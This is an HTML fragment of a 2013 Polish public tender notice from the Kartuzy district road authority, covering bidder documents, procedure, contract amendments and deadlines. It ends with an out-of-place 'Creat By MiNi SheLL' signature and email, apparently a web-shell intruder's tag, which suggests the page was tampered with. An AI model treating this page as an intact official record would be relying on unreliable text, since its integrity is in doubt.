<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy 2. Oświadczenie z art. 24 ust. 1 i 2, art. 22 ust.1 3. Zakres powierzonych robót podwykonawcom 4. Dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartych w umowie, przez sporządzenie aneksu w zakresie: a) W zakresie terminu realizacji umowy: -opóźnienia w przekazaniu placu budowy z winy Zamawiającego; -wady i braki w dokumentacji projektowej lub innych dokumentów budowy, -wyjątkowo niesprzyjające warunki atmosferyczne uniemożliwiające prowadzenie robót; -wykopaliska lub inne przeszkody uniemożliwiające prowadzenie robót; -zmiany dokumentacji projektowej; b) W zakresie zmiany wynagrodzenia: -wykonanie robót zamiennych i/lub dodatkowych, niezbędnych do wykonania przedmiotu umowy; -ustawowe zmiany wysokości podatku VAT (zmiana wynagrodzenia brutto); c) W zakresie innych zmian: -zmiany umowy polegające na zmianie jakości lub innych parametrów charakterystycznych dla danego dla danego elementu robót lub zmiana technologii, -zmiany w zakresie kolejności i terminów wykonywania robót budowlanych wskazanych w harmonogramie; -zmiana w przypadku aktualizacji rozwiązań z uwagi na postęp techniczny lub zmiany obowiązujących przepisów prawa -zmiana zakresu robót powierzonego podwykonawcom.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zdp.kartuzy.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Kartuzach 83-300 Kartuzy, ul. Gdańska 26, pokój nr 26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2013 godzina 10:45, miejsce: Zarząd Dróg Powiatowych w Kartuzach 83-300 Kartuzy, ul. Gdańska 26, pokój nr 26.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com